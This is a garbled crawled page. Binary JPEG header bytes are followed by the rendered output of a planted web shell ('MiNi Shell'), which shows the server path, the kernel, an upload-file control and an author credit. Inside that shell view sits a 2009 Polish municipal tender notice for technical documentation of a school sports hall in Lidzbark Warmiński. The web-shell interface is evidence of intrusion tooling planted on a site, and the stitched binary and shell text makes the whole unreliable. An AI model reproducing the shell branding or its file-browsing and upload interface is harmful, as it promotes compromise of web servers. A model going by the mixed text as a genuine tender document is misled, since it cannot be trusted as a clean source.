JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090924/163429-N-2009.html

<p class="kh_header"><b>Lidzbark Warmiński: Wykonanie dokumentacji technicznej hali sportowej przy Szkole Podstawowej nr 1 w Lidzbarku Warmińskim</b><br>
<b>Numer ogłoszenia: 163429 - 2009; data zamieszczenia: 24.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej hali sportowej przy Szkole Podstawowej nr 1 w Lidzbarku Warmińskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:  Kompleksowe opracowanie dokumentacji technicznej hali sportowej przy Szkole Podstawowej Nr 1 w Lidzbarku Warmińskim, przy ul. Szkolnej.
1.1 Przedmiot zamówienia obejmuje kompleksowe opracowanie dokumentacji technicznej hali sportowej  o wymiarach w osiach uwarunkowanych wymiarami boisk i pomieszczeń zaplecza, zgodnie z następującymi uwarunkowaniami:
1.1.1 Należy zaprojektować halę sportową i zagospodarowanie terenu na działce nr 44/2 obrębu 10  przy ulicy Szkolnej w Lidzbarku Warmińskim, zgodnie z wytycznymi 
Wojewódzkiego Konserwatora Zabytków.
1.1.2 Konstrukcja budynku dowolna. Należy zaprojektować ekonomicznie najkorzystniejszą konstrukcję, z uwzględnieniem obowiązujących w tym zakresie norm, gwarantującą bezpieczeństwo, trwałość, łatwą i trwałą eksploatację oraz dobrą jakość. Konstrukcja dachu musi być niewidoczna z wnętrza hali i wyłożona materiałem dźwiękochłonnym.
1.1.3 Wysokość wolnej przestrzeni nad polem gry, wolna od jakichkolwiek przeszkód, mierząc od podłoża, powinna wynosić min. 7,5 m.
1.1.4 Budynek hali musi być wyposażony w następujące instalacje:
	- wodno - kanalizacyjną,
	- ciepłej wody,
	- deszczową,
	- ppoż.,
	- wentylację z ogrzewaniem z odzyskiem ciepła i gruntowym wymiennikiem       
ciepła,
	- elektryczną i oświetleniową halogenową dwustopniową max 1010 luxów ewakuacyjną itp.,
	- monitoring,
	- instalację zegara,
	- radiofonizację,
	- dzwonek,
	- odgromową
         - telefoniczną,
        - przewody elektryczne miedziane zabezpieczone ochroną przeciw 
          przepięciową i przeciw porażeniową, zgodnie z obowiązującymi przepisami.

1.1.5 Wymagane wykończenia budynku:
	- tynki gładkie kat. III malowane farbą zmywalną,
	- okładziny zmywalne - glazura, gres - antypoślizgowe,
	- podłoga powierzchniowo-elastyczna na konstrukcji rusztu, mechanicznie 
          wentylowana, nawierzchnia: Marmolem sport, lub równoważna -             wymagany certyfikat,
	- wykładzina akustyczna (dźwiękochłonna) konstrukcji dachu od spodu,
	- stolarka okienna PVC,
	- drzwi wewnętrzne drewniane,
	- drzwi wewnętrzne do hali i na zewnątrz aluminiowe malowane.
1.1.6 Wymagane zagospodarowanie terenu:
	- budynek hali należy zaprojektować w Lidzbarku Warmińskim w obrębie 10  na działce nr 44/2 przy ulicy Szkolnej.
	- teren między budynkiem hali a terenem szkoły należy zagospodarować zielenią i niezbędną komunikacją. Przewidzieć parking na 25 samochodów osobowych wraz  z zatoką autobusową (nawierzchnia powinna przenosić obciążenia 5 t na oś) oraz 	  dojścia do obiektu, zieleń i oświetlenie zewnętrzne oraz niezbędne elementy małej architektury. Pozostały teren pozostawić w stanie niezmienionym dla budowy            w przyszłości boisk sportowych. 
2. Wymagane właściwości funkcjonalno-użytkowe:
2.2 W hali sportowej planuje się planuje się: rozgrywki sportowe, organizację akademii 
      szkolnych i imprez okolicznościowych i związku z powyższym należy zaprojektować:
2.2.1 W hali sportowej o wymiarach areny min. 24 m x 44 m, następujące boiska sportowe:
	- Piłka ręczna, o wym. 20m x 40m,
	- Siatkówka, o wym. 9m x 18m x 3szt (boisko główne, 2 boiska boczne w skrajnych sektorach),
	- Koszykówka, o wym. 15m x 28 m,
	- Tenis ziemny, o wym. 23,77 m x 8,23- gra pojedyncza i 10,97 m - gra podwójna.
2.2.2 Linie boczne oznaczone na podłodze hali.
2.2.3 Powierzchnię hali podzieloną na 3 strefy/boiska do zajęć wf za pomocą przegród  uruchamianych mechanicznie w poprzek pola gry do piłki ręcznej tworząc trzy małe boiska wyposażone w kosze do koszykówki zamocowane w podłodze do słupka do gry w siatkówkę, oddzielone kotarami do wysokości 3,2 m pełnymi.
2.2.4 Budynek hali wyposażony w zaplecze socjalne. Zaplecze powinno mieć min. 6 szatni po 18 osób, pomieszczenie sędziowskie z węzłami WC i natryskami, 1 pokój trenerów z WC i natryskiem, pomieszczenie klubowe o powierzchni min.25 m2, WC dla publiczności z przystosowaniem dla osób niepełnosprawnych, magazynki na sprzęt sportowy i ewentualne pomieszczenie dla sprzątaczek, szatnię ogólną dla kibiców. 
2.2.5 Trybuny w hali dla publiczności na min. 800 miejsc, w tym 200 miejsc stałych. Pozostałe miejsca mogą być wykonane w formie trybuny rozsuwanej, panel  o długości 8 m (?1m), z możliwością przesuwania i mocowania w kierunku centralnego boiska do gry w piłkę siatkową.
2.2.6 Obiekt przystosowany dla osób niepełnosprawnych, posiadający co najmniej 2 szatnie i WC przystosowane dla niepełnosprawnych.
2.2.7 Niezbędne wyposażenie hali, w tym:
	-Stolik sędziowski i miejsca zawodników wzdłuż dłuższego boku boiska, z zachowaniem strefy bezpieczeństwa,
	-Tablica wyników z przenośnym sterowaniem widoczna dla stolika sędziowskiego i publiczności,
	-Tablica z koszem podwieszana, opuszczana elektrycznie - 2 szt.
	-Urządzenia do koszykówki (kosze + tablice) boczne składane na ścianę, tablice ze szkła akrylowego o wym. 180 x 105 cm, obręcz uchylna, płynna regulacja wysokości 	 2,6 -3,05 m - 6 szt.
	-Słupki (w tym jeden dla sędziego) z siatką, gniazdami i antenkami do gry w siatkówkę wraz z zamocowaniem w podłodze - 2 komplety.
           - Bramki z siatką do piłki ręcznej mocowane do podłoża - profesjonalne, po 
            zakończeniu gry podciągane na ścianę i mocowane
           - Za bramkami osłona z siatki na całej szerokości hali,
          - Drabinki gimnastyczne o wysokości 2,5 m na jednej ze ścian,
          - Kotara min. 3,2 m wysokości pełna uruchamiana mechanicznie, dzieląca halę na 3 boiska treningowe,
          - Wielofunkcyjny zegar elektroniczny,
          - Nagłośnienie stałe, akustyczne,
          - Żaluzje mechaniczne na oknach,
          - Szatnie z wyposażeniem,
          - Rusztowanie rozkładane przejezdne służące konserwacji,
          - lampy odporne na uszkodzenia - halogenowe,
          - pozostałe wyposażenie zgodnie z obowiązującymi standardami.
3. Wymagane jest, aby Wykonawca usług dokonał inwentaryzacji stanu istniejącego. 
4. W przypadku wystąpienia kolizji istniejącego uzbrojenia z infrastrukturą 
    nowoprojektowaną, należy zaprojektować przebudowę istniejącego uzbrojenia.
5.  W zakres przedmiotu zamówienia wchodzą n/w wymienione opracowania i decyzje:
    - sporządzenie aktualnych map sytuacyjno-wysokościowych do celów projektowych,
    - sporządzenie dokumentacji geologicznej, 
    - wykonanie projektu budowlanego, wykonawczego i informacji dotyczącej bezpieczeństwa i ochrony zdrowia, 
   - opracowanie dokumentacji projektowej koniecznej do przeprowadzenia postępowania na wybór wykonawcy robót wymaganej rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U Nr 202, poz. 2072),  
   - opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych,
   - opracowanie przedmiarów robót,  
   - opracowanie kosztorysów inwestorskich,
   - uzyskanie prawomocnego pozwolenia na budowę,
   - charakterystykę energetyczną obiektu budowlanego,
   - inne nie wymienione wyżej, które są niezbędne do prawidłowej realizacji przedmiotu zamówienia.
6. Zakres i forma dokumentacji projektowej musi być zgodna z  Rozporządzeniem 
    Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót 
     budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202 z 2004 r., poz. 2072, z późn. zm.). Przyjęte rozwiązania muszą odpowiadać zasadom wiedzy technicznej, obowiązującym normom przenoszącym europejskie normy zharmonizowane, przepisom techniczno-budowlanym i warunkom technicznym wynikającym z funkcji, jaką będzie pełnić obiekt budowlany.
7. Wykonawca zapewnia nadzór autorski w ramach wykonywanej dokumentacji 
    projektowej do czasu zrealizowania inwestycji.
8. Dokumentacja techniczna inwestycji winna być wykonana zgodnie z wiedzą techniczną, obowiązującymi normami i przepisami prawa i będzie służyła między innymi do opisu przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego i  w związku z tym winna spełniać wymagania wynikające z art. 29-33 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 ze zm.) i przepisów wykonawczych do tej Ustawy.
9. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do wykonania wszystkich niezbędnych opracowań, badań, ekspertyz oraz pozyskania wymaganych prawem opinii, uzgodnień i pozwoleń. 
10. Opracowana dokumentacja musi obejmować wszystkie branże, zawierać wszystkie 
     uzgodnienia, oraz być kompletna z punktu widzenia celu, któremu ma służyć tj. dla 
     prawidłowej realizacji inwestycji zgodnie z obowiązującymi przepisami i wiedzą 
     techniczną oraz spełniając wymagania:
	a) ustawy z dnia 7 lipca  1994 r. Prawo budowlane (t.j. Dz.U. z 2006 r., Nr 156, poz. 	1118, z późn. zm.), 
	b) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie 
            warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz.U. Nr 75, poz. 690, z późn. zm.), 
    	c) Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie 	szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133,        z późn. zm.) 
   	d) innych aktów prawnych, Polskich Norm, zasad wiedzy technicznej i sztuki 
            budowlanej dotyczących procesu inwestycyjnego.
11. Zakres zamówienia obejmuje również w miarę potrzeb aktualizację dokumentacji 
     technicznej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu ma obowiązek wnieść wadium  w wysokości:    
3 000,00 zł. (słownie: trzy tysiące złotych) przed  terminem składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)Posiadają uprawnienia do wykonywania działalności lub czynności objętych
zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia. 
4)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty oświadczeń i dokumentów, o których mowa w  części VII specyfikacji istotnych warunków zamówienia. Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg formuły: spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy  
    wraz z ofertą winni złożyć następujące dokumenty:
1)W celu potwierdzenia posiadania uprawnień do wykonywania działalności lub czynności w zakresie objętych niniejszym zamówieniem, Wykonawcy są zobowiązani  złożyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego  z nich),
2)W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym, a także dysponowania osobami zdolnymi do wykonania niniejszego zamówienia, Wykonawca musi dołączyć do oferty następujące dokumenty (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców    o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny  i kadrowy oraz łączne kwalifikacje i doświadczenie):
a) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą     uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa wyżej, wykonawca wskazał osoby, którymi będzie dysponował,  według wzoru stanowiącego załącznik nr 3 do SIWZ. 
Wykonawca  musi wykazać, że dysponuje lub będzie dysponował minimum po jednej osobie posiadającej uprawnienia budowlane do projektowania w specjalności:
        -architektonicznej, lub odpowiadające im  ważne  uprawnienia budowlane   
          wydane na podstawie wcześniej obowiązujących przepisów.
	- konstrukcyjno-budowlanej, lub odpowiadające im  ważne  uprawnienia   
	  budowlane wydane na podstawie wcześniej obowiązujących przepisów.
       - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,         
          wentylacyjnych, wodociągowych i kanalizacyjnych, lub odpowiadające im  
          ważne  uprawnienia budowlane wydane na podstawie wcześniej  
          obowiązujących przepisów.
      - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
        elektroenergetycznych, lub odpowiadające im  ważne  uprawnienia     
        budowlane wydane na podstawie wcześniej obowiązujących przepisów.
     - drogowej lub odpowiadające im  ważne  uprawnienia budowlane wydane na      
        podstawie wcześniej obowiązujących przepisów.
     - telekomunikacyjnej, lub odpowiadające im ważne  uprawnienia budowlane 
        wydane na podstawie wcześniej obowiązujących przepisów.
Osoby, o których mowa wyżej muszą być wpisane na listę członków Izby  
Inżynierów Budownictwa i ubezpieczone od odpowiedzialności cywilnej, co  
daje prawo wykonywania samodzielnych funkcji technicznych w budownictwie  zgodnie z ustawą z dnia 15 grudnia 2000 roku o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001r., Nr 5,              poz. 42 z późn. zm.).
b) dokumenty potwierdzające, że osoby, o których mowa wyżej posiadają
    wymagane  uprawnienia do projektowania w w/w specjalnościach, oraz
    aktualne zaświadczenia tych osób o wpisie na listę właściwej izby samorządu
    zawodowego.
c) Wykaz wykonanych przez Wykonawcę usług  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli 
okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających 
swoim rodzajem i  wartościom usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wg wzoru stanowiącego załącznik nr 4 do SIWZ.
Wymagane doświadczenie Wykonawcy w wykonaniu co najmniej jednej  usługi polegającej na wykonaniu dokumentacji technicznej hali sportowej. Do oferty należy również dołączyć dokumenty potwierdzające, że usługi te zostały wykonane 
należycie. Wykonawcy składający ofertę wspólną przedstawiają razem jeden dokument w formie załącznika nr 4.
3) Oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do  niniejszego zaproszenia, o spełnianiu warunków udziału w postępowaniu. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców - oświadczenie musi być podpisane przez wszystkich Wykonawców.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  
     Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w ust. 1 pkt. 1a)
     składa dokument lub dokumenty, zgodnie z § 2 Rozporządzenia Prezesa Rady 
     Ministrów z dnia 19 maja 2006 roku  w sprawie  dokumentów, jakich może żądać 
   zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane 
     (Dz.U. nr 87, poz. 605, z późn. zm)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2009 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. Świętochowskiego 14, pok. nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com